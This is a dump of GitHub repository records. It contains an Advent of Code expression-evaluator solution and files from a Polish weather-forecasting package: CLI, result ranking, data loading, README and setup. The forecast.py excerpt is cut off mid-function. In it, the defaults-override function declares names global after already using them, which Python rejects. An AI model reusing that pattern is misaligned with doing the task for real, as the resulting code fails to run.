\n return min_dist, identity\n\n\nwho_is_it(\"images/images/camera_3.jpg\", database, FRmodel)"
}
] | 3 |
rneilsen/advent-of-code-2020 | https://github.com/rneilsen/advent-of-code-2020 | 067fcb08a171e00f39a718fe2a56bd57c471f78e | 54ba71c80f6e6c9d5900502126474c338b117bc4 | b44042d103b32358ced619ddfd66d6be0a887486 | refs/heads/main | 2023-02-08T05:40:56.903430 | 2020-12-31T15:24:14 | 2020-12-31T15:24:14 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46480685472488403,
"alphanum_fraction": 0.4811158776283264,
"avg_line_length": 33.27941131591797,
"blob_id": "6de3403a9649e7d85305e6872e7f161e09492f6a",
"content_id": "1a6edde43359526208874dc833a77e107205514f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2330,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 68,
"path": "/18/18.py",
"repo_name": "rneilsen/advent-of-code-2020",
"src_encoding": "UTF-8",
"text": "from os.path import abspath, dirname, join\nfrom collections import deque\nfrom itertools import islice\nfrom typing import List, Tuple\n\nwith open(abspath(join(dirname(__file__), 'input'))) as f:\n lines = [l.strip() for l in f.readlines()]\n\ndef evaluate(line: List[str]) -> Tuple[int, List[str]]:\n while '(' in line:\n start_paren = end_paren = line.index('(')\n paren_depth = 1\n while paren_depth > 0:\n end_paren += 1\n if line[end_paren] == '(':\n paren_depth += 1\n elif line[end_paren] == ')':\n paren_depth -= 1\n line = line[:start_paren] + \\\n [evaluate(line[start_paren+1:end_paren])] + \\\n line[end_paren+1:]\n \n val = int(line[0])\n i = 1\n while i < len(line):\n if line[i] == '+':\n val += int(line[i+1])\n elif line[i] == '*':\n val *= int(line[i+1])\n i += 2\n return val\n\n\ndef part1() -> int:\n return sum([evaluate(list(line.replace(' ', ''))) for line in lines])\n\ndef part2() -> int:\n # parse input to insert parens around all addition expressions\n new_lines = []\n for line in lines:\n line = line.replace(' ', '')\n next_plus = line.find('+')\n while next_plus != -1:\n left_edge = next_plus - 1\n paren_depth = (1 if line[left_edge] == ')' else 0)\n while paren_depth > 0:\n left_edge -= 1\n if line[left_edge] == ')':\n paren_depth += 1\n elif line[left_edge] == '(':\n paren_depth -= 1\n right_edge = next_plus + 1\n paren_depth = (1 if line[right_edge] == '(' else 0)\n while paren_depth > 0:\n right_edge += 1\n if line[right_edge] == '(':\n paren_depth += 1\n elif line[right_edge] == ')':\n paren_depth -= 1\n if left_edge != 0 or right_edge != len(line) - 1:\n line = line[:left_edge] + '(' + line[left_edge:right_edge + 1] + ')' + line[right_edge + 1:]\n next_plus = line.find('+', next_plus + 2)\n new_lines.append(line)\n\n return sum([evaluate(list(line.replace(' ', ''))) for line in new_lines])\n\nprint(\"Part 1:\", part1())\nprint(\"Part 2:\", part2())"
}
] | 1 |
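The part-2 trick in `18.py` above is to wrap every addition in parentheses so that `+` binds tighter than `*` before the flat left-to-right evaluator runs, e.g. `1 + 2 * 3 + 4` becomes `(1 + 2) * (3 + 4)`. A quick spot check with the file's own `evaluate` (assuming it is importable; the expression is a made-up example):

    # evaluate() works on single-character tokens, so strip spaces first
    print(evaluate(list('(1+2)*(3+4)*(5+6)')))  # 231 = 3 * 7 * 11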
aquarioos/dvik-forecast | https://github.com/aquarioos/dvik-forecast | c7c720a7a57a5c1b32923cacfc703c6ccf16af72 | 659fdb4a8108ed82cbab53ce78498de11f6d5047 | ee3ee5f3fa110b99ec59b9799351d9fdcb365fc4 | refs/heads/master | 2018-11-17T06:12:33.576414 | 2018-09-04T23:23:27 | 2018-09-04T23:23:27 | 144,966,812 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5906499624252319,
"alphanum_fraction": 0.5952109694480896,
"avg_line_length": 25.57575798034668,
"blob_id": "37363517abcd5799b9969eb15eb4bd61f746fe95",
"content_id": "1e0c4b82c3ec0fd468b110224296e1c99334bc4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 33,
"path": "/tools/command_line.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import argparse as ap\n\nfrom . import rank\n\n\ndef _get_args() -> ap.Namespace:\n \"\"\"Pobiera komendę:\n\n * cmd - komenda\n\n Returns:\n wybrana komenda\n \"\"\"\n\n parser = ap.ArgumentParser()\n\n parser.add_argument('cmd', metavar='CMD', choices=('rank', 'cmd1', 'cmd2'),\n help='Komenda wskazująca które narzędzie zostanie użyte.')\n parser.add_argument('-cfp', '--csv_file_path', help=\"Ścieżka do pliku CSV, wymagane przy 'rank'.\")\n parser.add_argument('-n', '--n_best', type=int, default=25,\n help=\"Liczba najlepszych resultatów\")\n parser.add_argument('-m', '--minimal', action='store_true')\n\n return parser.parse_args()\n\n\ndef main():\n # print('*** DVIK-FORECAST-TOOLS COMMAND_LINE ***')\n\n args = _get_args()\n\n if args.cmd == 'rank':\n rank.run(args.csv_file_path, args.n_best, args.minimal)\n"
},
{
"alpha_fraction": 0.6314911842346191,
"alphanum_fraction": 0.6357789635658264,
"avg_line_length": 29.642335891723633,
"blob_id": "e47a6ffdf43c701866ad8597a54828631e58a176",
"content_id": "5c1f01f57033c2f8b541259f867c33e5fb4df091",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4250,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 137,
"path": "/tools/rank.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import csv\nimport os\nimport typing\n\nMEAN_DIFF = 'średnie odchylenie'\nMED_DIFF = 'mediana odchylenia'\nMAX_DIFF = 'maksymalne odchylenie'\nSOLVER = 'solver'\nACTIVATION = 'activation'\nHIDDEN_LAYERS = 'hidden_layers'\nCSV_FIELDS = ['średnie odchylenie', 'mediana odchylenia', 'maksymalne odchylenie',\n 'oczekiwane odchylenie standardowe', 'otrzymane odchylenie standardowe']\n\n\n# N_RESULTS = 25\n\n\ndef run(csv_file: str, n_best: int, minimal: bool):\n \"\"\"Uruchamia polecenie \"rank\".\n Potrzebuje pliku CSV z wynikami uczenia.\n Ten plik musi mieć konkretną strukturę! Tzn. musi mieć pola, po których będzie sortowanie.\n Jak nie ma któregoś z wymaganych pól, to do widzenia.\n A jak są, to sortuje i wypisuje to w ładnej formie. Na razie zwykły ciąg typu \"key=value, key=value, ...\"\n\n Args:\n csv_file: ścieżka do pliku csv\n n_best: liczna najlepszych rezultatów\n minimal: czy pokazać minimalne wyjście (tylko statystyki parametrów)\n\n Raises:\n IOError: jeśli plik CSV nie zawiera tego, co trzeba lub (co gorsze) nie istnieje\n ValueError: jeśli csv_file jest None\n \"\"\"\n\n if csv_file is None:\n raise ValueError(\"ścieżka do pliku CSV jest None\")\n\n csv_file = os.path.abspath(csv_file)\n\n if not os.path.exists(csv_file):\n raise IOError(\"plik {} nie istnieje\".format(csv_file))\n\n rows = []\n with open(csv_file, 'r') as fp:\n reader = csv.DictReader(fp)\n for row in reader:\n rows.append(row)\n\n n_results = min(len(rows), n_best)\n\n rows = sorted(rows, key=_stats_score)\n\n opts = _collect_options(rows)\n\n solver_stats = dict.fromkeys(opts[SOLVER], 0)\n activation_stats = dict.fromkeys(opts[ACTIVATION], 0)\n hidden_layers_stats = dict.fromkeys(opts[HIDDEN_LAYERS], 0)\n\n if not minimal:\n print(\"\\nranking {} najlepszych rezultatów:\\n\".format(n_results))\n\n for i, r in enumerate(rows[:n_results]):\n if not minimal:\n print(\"{}. 
{}={}, {}={}\".format(\n                i + 1, MEAN_DIFF, r[MEAN_DIFF], MED_DIFF, r[MED_DIFF], MAX_DIFF, r[MAX_DIFF]))\n            print(\"\\t{}={}, {}={}, {}={}\".format(\n                SOLVER, r[SOLVER], ACTIVATION, r[ACTIVATION], HIDDEN_LAYERS, r[HIDDEN_LAYERS]))\n\n        solver_stats[r[SOLVER]] += 1\n        activation_stats[r[ACTIVATION]] += 1\n        hidden_layers_stats[r[HIDDEN_LAYERS]] += 1\n\n    print(\"\\nprocentowy udział parametrów klasyfikatora dla {} najlepszych rezultatów:\\n\".format(n_results))\n\n    print(SOLVER)\n    for k in _sort_options_stats(solver_stats):\n        print(\"\\t{} = {}%\".format(k, round(100 * solver_stats[k] / n_results)))\n\n    print(ACTIVATION)\n    for k in _sort_options_stats(activation_stats):\n        print(\"\\t{} = {}%\".format(k, round(100 * activation_stats[k] / n_results)))\n\n    print(HIDDEN_LAYERS)\n    for k in _sort_options_stats(hidden_layers_stats):\n        print(\"\\t{} = {}%\".format(k, round(100 * hidden_layers_stats[k] / n_results)))\n\n\ndef _sort_options_stats(opt_dict: typing.Dict[str, int]) -> typing.List[str]:\n    \"\"\"Sortuje opcje wg wyników od najwyższego (najwięcej wystąpień).\n\n    Args:\n        opt_dict: słownik z danymi opcjami\n\n    Returns:\n        lista kluczy od najczęściej występującego\n    \"\"\"\n\n    return list(sorted(opt_dict, key=lambda k: opt_dict[k], reverse=True))\n\n\ndef _stats_score(a: typing.Dict[str, str]) -> typing.Tuple[float, float, float]:\n    \"\"\"Zwraca punktację danego wyniku. Wartości z csv.DictReader są napisami,\n    więc przed porównaniem rzutujemy je na float (inaczej sortowanie byłoby\n    leksykograficzne).\n\n    Args:\n        a: słownik ze statystykami (wartości jako napisy z pliku CSV)\n\n    Returns:\n        punkty\n    \"\"\"\n\n    return float(a[MEAN_DIFF]), float(a[MAX_DIFF]), float(a[MED_DIFF])\n\n\ndef _collect_options(rows: typing.List[dict]) -> dict:\n    \"\"\"Zbiera dostępne opcje dla parametrów solver, activation i hidden_layers.\n\n    Args:\n        rows: lista słowników reprezentujących wiersze z pliku CSV\n\n    Returns:\n        słownik przypisujący listę dostępnych opcji dla każdego z parametrów\n    \"\"\"\n\n    solvers = set()\n    activations = set()\n    hidden_layers = set()\n\n    for r in rows:\n        solvers.add(r[SOLVER])\n        activations.add(r[ACTIVATION])\n        hidden_layers.add(r[HIDDEN_LAYERS])\n\n    return {\n        SOLVER: list(solvers),\n        ACTIVATION: list(activations),\n        HIDDEN_LAYERS: list(hidden_layers)\n    }\n"
},
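One detail worth noting about `rank.py` above: `csv.DictReader` yields every field as a string, which is why `_stats_score` casts to `float` before sorting. A two-line sketch of the pitfall the cast avoids (hypothetical values):

    rows = [{'średnie odchylenie': '10.5'}, {'średnie odchylenie': '2.3'}]
    print(sorted(r['średnie odchylenie'] for r in rows))         # ['10.5', '2.3'] - lexicographic, wrong
    print(sorted(float(r['średnie odchylenie']) for r in rows))  # [2.3, 10.5]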
{
"alpha_fraction": 0.6126018762588501,
"alphanum_fraction": 0.6173722743988037,
"avg_line_length": 30.05555534362793,
"blob_id": "0814504ec2b2b0170a5e2bfebab26547d434a3c2",
"content_id": "513d14657d48df8651f859fc15c13f9b80e5a7ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5080,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 162,
"path": "/dvik_forecast/data_api.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import typing\nimport datetime\nimport os\nimport re\n\nfrom . import defaults as dfs\n\nimport dvik_loop as dvloop\n\nimport dvik_logging as dvl\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\n\n\ndef get_range_dts(data_dir: str, range_days: int,\n interval: int) -> typing.Tuple[datetime.datetime, datetime.datetime]:\n \"\"\"Zwraca datę początku i końca zakresu. Datę początku zaokrągla w górę według interwału, zaś datę końca w dół.\n\n Args:\n data_dir: ścieżka do katalogu z danymi\n range_days: liczba dni zakresu\n interval: interwał czasowy zakresu\n\n Returns:\n data początku, data końca\n \"\"\"\n\n first_dt = _get_first_file_dt(data_dir, dfs.LOOP2_FILE_RE, dfs.LOOP2_FILE_DT)\n\n start_dt = dfs.UTC_NOW - datetime.timedelta(days=range_days)\n if first_dt > start_dt:\n L.warn('start_dt = {}, first_dt = {}, start_dt := first_dt'.format(start_dt, first_dt))\n start_dt = first_dt\n end_dt = dfs.UTC_NOW\n\n interval_hrs = datetime.timedelta(hours=interval)\n\n tmp_dt = datetime.datetime(year=start_dt.year, month=start_dt.month, day=start_dt.day)\n while tmp_dt < start_dt:\n tmp_dt += interval_hrs\n L.debug('start_dt = {} -> {}'.format(start_dt, tmp_dt))\n start_dt = tmp_dt\n\n tmp_dt = datetime.datetime(year=end_dt.year, month=end_dt.month, day=end_dt.day)\n while tmp_dt <= end_dt - interval_hrs:\n tmp_dt += interval_hrs\n L.debug('end_dt = {} -> {}'.format(end_dt, tmp_dt))\n end_dt = tmp_dt\n\n return start_dt, end_dt\n\n\ndef _get_first_file_dt(data_dir: str, data_file_re: str, data_file_dt: str) -> datetime.datetime:\n \"\"\"Zwraca datę najstarszego pliku z danymi z danego zbioru.\n\n Args:\n data_dir: ścieżka do katalogu z danymi\n data_file_re: wzorzec nazwy pliku (np. r'loop2_\\d{6}_\\d{4}\\.dat')\n data_file_dt: wzorzec daty w nazwie pliku (np. 
'loop2_%y%m%d_%H%M.dat')\n\n    Returns:\n        data pierwszego pliku\n    \"\"\"\n\n    min_year_dir = min(filter(\n        lambda d: re.match(r'\\d{4}', d),\n        os.listdir(data_dir)\n    ))\n    year_data_dir = os.path.join(data_dir, min_year_dir)\n    min_month_dir = min(filter(\n        lambda d: re.match(r'\\d{2}', d),\n        os.listdir(year_data_dir)\n    ))\n    month_data_dir = os.path.join(year_data_dir, min_month_dir)\n    min_day_dir = min(filter(\n        lambda d: re.match(r'\\d{2}', d),\n        os.listdir(month_data_dir)\n    ))\n    day_data_dir = os.path.join(month_data_dir, min_day_dir)\n    min_file = min(filter(\n        lambda d: re.match(data_file_re, d),\n        os.listdir(day_data_dir)\n    ))\n\n    return datetime.datetime.strptime(min_file, data_file_dt)\n\n\ndef get_loop2_data(data_dir: str, start_dt: datetime.datetime, end_dt: datetime.datetime,\n                   interval: int) -> typing.Dict[datetime.datetime, dict]:\n    \"\"\"Zwraca słownik z danymi LOOP2 w formacie data -> słownik z wartościami.\n\n    Args:\n        data_dir: ścieżka do katalogu z danymi LOOP2\n        start_dt: początkowa data zakresu\n        end_dt: końcowa data zakresu\n        interval: interwał czasowy w godzinach\n\n    Returns:\n        słownik z danymi LOOP2 przypisujący słownik z wartościami dla dat\n    \"\"\"\n\n    l2s = dvloop.Loop2Series(data_dir, start_dt, end_dt, interval)\n    l2_data = l2s.get_data(with_current=False)\n\n    return l2_data\n\n\ndef get_dts(start_dt: datetime.datetime, end_dt: datetime.datetime,\n            interval: int) -> typing.List[datetime.datetime]:\n    \"\"\"Zwraca posortowaną listę dat z danego zakresu.\n\n    Args:\n        start_dt: początek zakresu\n        end_dt: koniec zakresu\n        interval: interwał zakresu\n\n    Returns:\n        posortowana lista dat z danego zakresu\n    \"\"\"\n\n    interval_td = datetime.timedelta(hours=interval)\n    tmp_dt = start_dt\n    dts = []\n    while tmp_dt <= end_dt:\n        dts.append(tmp_dt)\n        tmp_dt += interval_td\n\n    return dts\n\n\ndef get_dt_sets(dts: typing.List[datetime.datetime], n_sets: int, set_intervals: int,\n                horizon_intervals: typing.List[int]\n                ) -> typing.List[typing.Dict[str, typing.List[datetime.datetime]]]:\n    \"\"\"Tworzy listę zestawów dat wejściowych i wyjściowych. Lista jest w postaci\n    [{'in_dts': [dt1, dt2, ...], 'out_dts': [dt1, dt2, ...]}, ...]\n\n    Args:\n        dts: dostępne daty w zakresie\n        n_sets: całkowita liczba zestawów (uczących i testowych)\n        set_intervals: liczba interwałów w zestawie\n        horizon_intervals: interwały do prognozowania\n\n    Returns:\n        lista zestawów dat\n    \"\"\"\n\n    set_size = set_intervals + max(horizon_intervals)\n    step = (len(dts) - set_size) // n_sets\n\n    dt_sets = []  # {in_dts: [], out_dts: []}\n\n    for offset in range(0, n_sets * step, step):\n        in_dts = [dts[i + 1] for i in range(offset, offset + set_intervals)]\n        out_dts = [dts[i] for i in [offset + set_intervals + fi for fi in horizon_intervals]]\n        dt_sets.append({\n            'in_dts': in_dts,\n            'out_dts': out_dts,\n        })\n        assert all(dt in dts for dt in in_dts)\n        assert all(dt in dts for dt in out_dts)\n\n    return dt_sets\n"
},
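`get_range_dts` in `data_api.py` above rounds the start of the range up and the end down to whole interval boundaries by stepping from midnight. A standalone sketch of the rounding-up half, assuming a 3-hour interval (the date is arbitrary):

    import datetime

    def ceil_to_interval(dt, hours):
        # step from midnight in `hours` increments until we reach or pass dt
        base = dt.replace(hour=0, minute=0, second=0, microsecond=0)
        while base < dt:
            base += datetime.timedelta(hours=hours)
        return base

    print(ceil_to_interval(datetime.datetime(2018, 9, 4, 13, 20), 3))  # 2018-09-04 15:00:00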
{
"alpha_fraction": 0.4324618875980377,
"alphanum_fraction": 0.46568626165390015,
"avg_line_length": 29.600000381469727,
"blob_id": "dba5f56364a163e1515b23b047517995eaabd973",
"content_id": "18d774b5b49f5ccd9513eb2e77cc3fa034d83abf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1836,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 60,
"path": "/dvik_forecast/table.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "class Table:\n def __init__(self, side='left', extra_space=1):\n self.__data = {}\n self.__tr_data = {}\n self.__min_col = 999999\n self.__max_col = -999999\n self.__min_row = 999999\n self.__max_row = -999999\n assert side in ('left', 'right')\n if side == 'left':\n self.__just = lambda v, w: v.ljust(w + extra_space)\n else:\n self.__just = lambda v, w: v.rjust(w + extra_space)\n\n def add(self, row, col, val):\n assert isinstance(row, int)\n assert isinstance(col, int)\n val = str(val)\n if not row in self.__data:\n self.__data[row] = {}\n self.__data[row][col] = val\n\n self.__min_row = min(row, self.__min_row)\n self.__max_row = max(row, self.__max_row)\n self.__min_col = min(col, self.__min_col)\n self.__max_col = max(col, self.__max_col)\n\n def __str__(self):\n arr = []\n for row in range(self.__min_row, self.__max_row + 1):\n curr_row = []\n for col in range(self.__min_col, self.__max_col + 1):\n try:\n curr_row.append(self.__data[row][col])\n except KeyError:\n curr_row.append('')\n arr.append(curr_row)\n\n for col in range(self.__max_col - self.__min_col + 1):\n max_width = 0\n for row in arr:\n max_width = max(max_width, len(row[col]))\n for row in arr:\n row[col] = self.__just(row[col], max_width)\n\n return '\\n'.join(' '.join(v for v in col) for col in arr)\n\n\nif __name__ == '__main__':\n t = Table(extra_space=3)\n\n t.add(1, 1, '111')\n t.add(1, 2, '12')\n t.add(1, 3, '13')\n t.add(2, 1, '21')\n t.add(2, 2, '221')\n t.add(2, 3, '23')\n t.add(4, 3, '431')\n\n print(t)\n"
},
{
"alpha_fraction": 0.608960747718811,
"alphanum_fraction": 0.6460763812065125,
"avg_line_length": 24.3154354095459,
"blob_id": "392fdee173f541b1d87661e4d789ea8d8688f44f",
"content_id": "23ea4758e0f8954dac4b18cbdef568aef59bd084",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3854,
"license_type": "permissive",
"max_line_length": 212,
"num_lines": 149,
"path": "/README.md",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "# dvik-forecast\nPrognozowanie pogody za pomocą uczenia maszynowego.\n\n## Wersja\n\n0.3\n\n## Zmiany\n\n### 0.3\n\n* dodanie niepewności standardowej\n* prognozowanie wartości parametrów\n* zamiana forecasts na horizons\n\n### 0.2\n\n* dodanie możliwości nadpisywania domyślnych parametrów za pomocą pliku JSON (rozdział **Nadpisywanie domyślnych wartości**)\n* dodanie obsługi wiatru, ciśnienia i opadu\n* README\n* obsługa 4 parametrów: temperatury, wiatru, ciśnienia i opadu\n\n## Instalacja\n\nModuł *dvik-forecast* instalujemy za pomocą menadżera pakietów *PIP*. Ponieważ w zależnościach są inne moduły systemu *dvik*, to należy dodać flagę `--process-dependency-links`.\n\n pip install git+https://github.com/aquarioos/dvik-forecast/#egg=dvik-forecast\n\n## Uruchomienie\n\nJeżeli program został poprawnie zainstalowany, to uruchamiamy go następująco:\n\n dvik-forecast [-h] -t {loop2,imgw} -dd DATA_DIR [-od OUTPUT_DIR] [-ld LOGS_DIR] [-d RANGE_DAYS] [-i {1,2,3,4,6,12}] [-ns TRAIN_SETS] [-nd TRAIN_DAYS] [-ts TEST_SETS] [-f FORECAST [FORECAST ...]] [-j CFG_JSON]\n\ngdzie:\n\n**-h, --help**\n\nPokazuje treść pomocy, program nie jest uruchamiany w takiej sytuacji.\n\n**-t {loop2,imgw}, --data_type {loop2,imgw}**\n\nRodzaj danych, na podstawie których będzie wyznaczana prognoza.\n\n**-dd DATA_DIR, --data_dir DATA_DIR**\n\nŚcieżka do katalogu z danymi. Musi być zgodna z rodzajem danych.\n\n**-od OUTPUT_DIR, --output_dir OUTPUT_DIR**\n\nKatalog na wyniki (domyślnie $HOME/dvf_data/forecast).\n\n**-ld LOGS_DIR, --logs_dir LOGS_DIR**\n\nKatalog na logi (domyślnie $HOME/dvf_data/logs).\n\n**-d RANGE_DAYS, --range_days RANGE_DAYS**\n\nLiczba dni wstecz (domyślnie 61).\n\n**-i {1,2,3,4,6,12}, --interval {1,2,3,4,6,12}**\n\nInterwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie 3).\n\n**-ns TRAIN_SETS, --train_sets TRAIN_SETS**\n\nLiczba zbiorów uczących (domyślnie 10).\n\n**-nd TRAIN_DAYS, --train_days TRAIN_DAYS**\n\nWielkość (w dniach) zbiorów uczących (domyślnie 10).\n\n**-ts TEST_SETS, --test_sets TEST_SETS**\n\nLiczba zbiorów testowych (domyślnie 5).\n\n**-s HORIZONS \\[HORIZONS ...\\], --horizons HORIZONS \\[HORIZONS ...\\]**\n\nGodziny prognozy (np. 6, 12, 18, 24, domyślnie \\[12, 24\\]). 
Muszą być podzielne przez interwał.\n\n**-j CFG_JSON, --cfg_json CFG_JSON**\n\nŚcieżka do pliku json z nadpisanymi domyślnymi parametrami klasyfikatora.\n\n## Nadpisywanie domyślnych wartości\n\nParametr *-j/--cfg_json* wskazuje na plik, w którym są nadpisane domyślne wartości, które przedstawiają się następująco:\n\n TEMPERATURE_TOLERANCE = 1.5\n\n PRESSURE_TOLERANCE = 2\n\n WIND_TOLERANCE = 2\n\n PRECIPITATION_TOLERANCE = 1\n\n HIDDEN_LAYER_FACTORS = [\n [1], [2],\n [1, 1], [2, 2],\n [1, 1.2, 1], [2, 2.4, 2],\n [1, 1, 1, 1], [2, 2, 2, 2],\n [1, 1.2, 1.4, 1.2, 1], [2, 2.4, 2.8, 2.4, 2],\n [1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2],\n ]\n\n MAX_ITER = 500000\n\n RES_SCALE = 4\n\n N_REPS = 15\n\n ACTIVATIONS = ['identity', 'logistic', 'tanh', 'relu']\n\n SOLVERS = ['lbfgs', 'sgd', 'adam']\n\n EARLY_STOPPING = True\n\nW celu nadpisywania powyższych parametrów należy dla odpowiadających im kluczy przypisać wybrane nowe wartości.\n\nKlucze:\n\n * temperature_tolerance\n * pressure_tolerance\n * wind_tolerance\n * precipitation_tolerance\n * hidden_layer_factors\n * max_iter\n * res_scale\n * n_reps\n * activations\n * solvers\n\nPrzykładowy plik JSON z nadpisanymi wartościami:\n\n {\n \"temperature_tolerance\": 2,\n \"pressure_tolerance\": 2,\n \"wind_tolerance\": 4,\n \"precipitation_tolerance\": 1.5,\n \"hidden_layer_factors\": [\n [1], [2],\n [1, 1, 1], [2, 2, 2]\n ],\n \"max_iter\": 1000,\n \"res_scale\": 4,\n \"n_reps\": 5,\n \"activations\": [\"logistic\", \"tanh\"],\n \"solvers\": [\"lbfgs\"]\n }\n"
},
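A sample invocation consistent with the flags documented in the README above (the data path and the JSON file name are placeholders):

    dvik-forecast -t loop2 -dd ~/davis/loop2 -i 3 -d 61 -s 12 24 -j override.json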
{
"alpha_fraction": 0.5659851431846619,
"alphanum_fraction": 0.5855018496513367,
"avg_line_length": 30.647058486938477,
"blob_id": "5c4ddb8b6fb7c100a1143fa2e7d78af21e09866a",
"content_id": "95f70dbcc14c52352887dda0c538c5d1fb5fdf23",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1077,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 34,
"path": "/setup.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n name='dvik-forecast',\n version='0.2',\n description='Moduł do prognozowania pogody.',\n url='https://github.com/aquarioos/dvik-forecast',\n author='Daniel Taranta',\n author_email='[email protected]',\n license='MIT',\n packages=['dvik_forecast', 'tools'],\n include_package_data=True,\n zip_safe=False,\n python_requires='>=3.4',\n install_requires=[\n 'typing',\n 'dvik-loop>=0.7',\n 'dvik-logging>=1.0',\n 'dvik-print>=0.3',\n 'scikit-learn>=0.19',\n 'sklearn',\n 'scipy>=1.1',\n ],\n dependency_links=[\n 'git+https://github.com/aquarioos/dvik-loop.git#egg=dvik-loop-0.7',\n 'git+https://github.com/aquarioos/dvik-logging.git#egg=dvik-logging-1.0',\n 'git+https://github.com/aquarioos/dvik-print.git#egg=dvik-print-0.3',\n ],\n # scripts=['dvik_forecast/command_line.py'],\n entry_points={\n 'console_scripts': ['dvik-forecast = dvik_forecast.command_line:main',\n 'dvik-forecast-tools = tools.command_line:main'],\n },\n)\n"
},
{
"alpha_fraction": 0.5776010155677795,
"alphanum_fraction": 0.5838922262191772,
"avg_line_length": 38.832149505615234,
"blob_id": "6091db4ba2db2991fc29ee6eb0cc77cb91adc200",
"content_id": "5268a26024830555535bc76cb3be0a127c7a930b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16901,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 423,
"path": "/dvik_forecast/forecast.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import typing\nimport os\nimport datetime\nimport json\n\nfrom . import defaults as dfs\nfrom . import learning as lng\nfrom . import data_api as dapi\n\nimport dvik_logging as dvl\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\ndvl.add_console_handler(dfs.LOGGER_NAME)\nL.debug('logger={}: dodano uchwyt do konsoli'.format(dfs.LOGGER_NAME))\n\nTEMPERATURE_TOLERANCE = 1.5\nPRESSURE_TOLERANCE = 2\nWIND_TOLERANCE = 2\nPRECIPITATION_TOLERANCE = 1\nHIDDEN_LAYER_FACTORS = [\n [1], [2],\n [1, 1], [2, 2],\n [1, 1.2, 1], [2, 2.4, 2],\n [1, 1, 1, 1], [2, 2, 2, 2],\n [1, 1.2, 1.4, 1.2, 1], [2, 2.4, 2.8, 2.4, 2],\n [1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2],\n]\nACTIVATIONS = [lng.ACTIVATION_IDENTITY, lng.ACTIVATION_LOGISTIC, lng.ACTIVATION_TANH, lng.ACTIVATION_RELU]\nALL_ACTIVATIONS = (lng.ACTIVATION_IDENTITY, lng.ACTIVATION_LOGISTIC, lng.ACTIVATION_TANH, lng.ACTIVATION_RELU)\nSOLVERS = [lng.SOLVER_LBFGS, lng.SOLVER_SGD, lng.SOLVER_ADAM]\nALL_SOLVERS = (lng.SOLVER_LBFGS, lng.SOLVER_SGD, lng.SOLVER_ADAM)\nMAX_ITER = 500000\nEARLY_STOPPING = True\nRES_SCALE = 4\nN_REPS = 15\n\nGOOD_RESULT = {\n 'min_result_score': 0.45,\n 'max_max_diff': 7.0,\n 'max_mean_diff': 2.8,\n 'max_med_diff': 2.4,\n 'max_sd_diff': TEMPERATURE_TOLERANCE,\n}\n\nTEMPERATURE_CODE = 'temp'\nPRESSURE_CODE = 'press'\nWIND_CODE = 'wind'\nPRECIPITATION_CODE = 'prec'\n\n\ndef _overwrite_defaults(cfg_json: str):\n \"\"\"Nadpisuje domyślne parametry klasyfikatora wartościami z pliku JSON.\n\n * temperature_tolerance: float\n * pressure_tolerance: float\n * wind_tolerance: float\n * precipation_tolerance: float\n * hidden_layer_factors: typing.List[typing.List[int]]\n * max_iter: int\n * res_scale: float\n * n_reps: int\n * activations: list\n * solvers: list\n\n Args:\n cfg_json: plik json\n \"\"\"\n\n temperature_tolerance_key = 'temperature_tolerance'\n pressure_tolerance_key = 'pressure_tolerance'\n wind_tolerance_key = 'wind_tolerance'\n precipitation_tolerance_key = 'precipitation_tolerance'\n hidden_layer_factors_key = 'hidden_layer_factors'\n max_iter_key = 'max_iter'\n res_scale_key = 'res_scale'\n n_reps_key = 'n_reps'\n activations_key = 'activations'\n solvers_key = 'solvers'\n\n json_data = json.load(open(cfg_json, 'r'))\n\n # TEMPERATURE TOLERANCE\n if temperature_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(temperature_tolerance_key))\n if type(json_data[temperature_tolerance_key]) in (int, float):\n L.info(\"TEMPERATURE_TOLERANCE = {} -> {}\".format(\n TEMPERATURE_TOLERANCE,\n json_data[temperature_tolerance_key]\n ))\n global TEMPERATURE_TOLERANCE\n TEMPERATURE_TOLERANCE = json_data[temperature_tolerance_key]\n\n # PRESSURE TOLERANCE\n if pressure_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(pressure_tolerance_key))\n if type(json_data[pressure_tolerance_key]) in (int, float):\n L.info(\"PRESSURE_TOLERANCE = {} -> {}\".format(\n PRESSURE_TOLERANCE,\n json_data[pressure_tolerance_key]\n ))\n global PRESSURE_TOLERANCE\n PRESSURE_TOLERANCE = json_data[pressure_tolerance_key]\n\n 